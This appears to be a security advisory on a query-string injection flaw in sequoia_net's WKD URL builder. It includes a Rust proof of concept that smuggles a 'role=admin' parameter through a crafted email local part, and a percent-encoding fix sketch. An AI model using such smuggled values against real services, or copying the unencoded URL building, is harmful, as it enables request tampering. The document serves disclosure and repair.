[Vulnerability] sequoia_net WKD URL builder injects raw local parts into query strings
Severity High
`net::wkd::Url::build` appends the user-controlled local part directly into the `?l=` query parameter without any percent-encoding (`net/src/wkd.rs`, lines 79-105). Local parts may legally contain characters such as `+`, `=`, `&`, or `%`, so an attacker can smuggle additional parameters or even fragment identifiers into the generated request URL. Clients using the helper to construct WKD lookups may therefore leak policy decisions or trigger server-side quirks that depend on the extra query parameters.
## Proof of Concept
The following proof-of-concept shows how a crafted email address injects a fake `role=admin` parameter into the URL returned by `Url::build`:
The file was saved to `/sequoia/net/example/email.rs` and executed via `cargo run --no-default-features --features "crypto-rust,allow-experimental-crypto,allow-variable-time-crypto" --example email`.
```rust
use sequoia_net::wkd::{Url, Variant};

fn main() -> anyhow::Result<()> {
    // Crafted email with attacker-controlled query injection
    let email = "alice+tag&role=admin@example.org";
    let url = Url::from(email)?;

    // Build both lookup variants from the same parsed address
    let advanced = url.build(None::<Variant>);
    let direct = url.build(Some(Variant::Direct));

    let injected = "role=admin";
    println!("\n[+] ✅ WKD URL Injection Demonstration");
    println!(" ► Input mailbox: {email}");
    if advanced.contains(injected) || direct.contains(injected) {
        println!(" ✅ Injected parameter detected in generated URLs!");
    } else {
        println!(" ❌ Injection not observed (unexpected)");
    }

    println!("\nGenerated URLs:");
    println!(" Advanced lookup: {advanced}");
    println!(" Direct lookup: {direct}\n");
    Ok(())
}
```
After execution, both printed URLs contain `?l=alice+tag&role=admin`, proving that the local part is spliced verbatim into the query string. Any intermediary that logs or interprets the request now sees the injected `role` parameter, which can be used to escalate privileges in brittle WKD deployments or to exfiltrate data via crafted mailbox names.
Last commit hash: `05e6707ad2c68fa52a30c3c9a21d54dc00089919`
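One way to close the hole is to percent-encode the local part before it reaches the `?l=` parameter. The sketch below is an added example, not sequoia-net code and not part of the original report: `encode_query_value`, `build_direct_url` and `query_param_count` are hypothetical helpers, the URL layout is a stand-in for the direct lookup, and the hash segment is a placeholder.

```rust
// Added example (not sequoia-net code): percent-encode the local part before
// it is placed in the `?l=` query parameter.

/// Percent-encode every byte that is not an RFC 3986 "unreserved" character.
fn encode_query_value(value: &str) -> String {
    let mut out = String::with_capacity(value.len());
    for &b in value.as_bytes() {
        match b {
            b'A'..=b'Z' | b'a'..=b'z' | b'0'..=b'9' | b'-' | b'.' | b'_' | b'~' => {
                out.push(b as char)
            }
            _ => out.push_str(&format!("%{:02X}", b)),
        }
    }
    out
}

/// Hypothetical stand-in for the direct-method URL layout; `hash` is the
/// already-computed path component and is passed in as a placeholder here.
fn build_direct_url(domain: &str, hash: &str, local_part: &str) -> String {
    format!(
        "https://{}/.well-known/openpgpkey/hu/{}?l={}",
        domain, hash, encode_query_value(local_part)
    )
}

/// Count the query parameters a server would see after splitting on `&`.
fn query_param_count(url: &str) -> usize {
    match url.split_once('?') {
        Some((_, query)) => {
            let query = query.split('#').next().unwrap_or("");
            query.split('&').filter(|p| !p.is_empty()).count()
        }
        None => 0,
    }
}

fn main() {
    // Constructed inputs: the local part from the proof of concept above,
    // plus one carrying '#' and '%'.
    for local in ["alice+tag&role=admin", "bob#frag%41"] {
        let url = build_direct_url("example.org", "HASH_PLACEHOLDER", local);
        println!("{} ({} query parameter(s))", url, query_param_count(&url));
    }
}
```

A regression test for the real fix can assert the same property: for any local part, the built URL carries exactly one query parameter and no fragment.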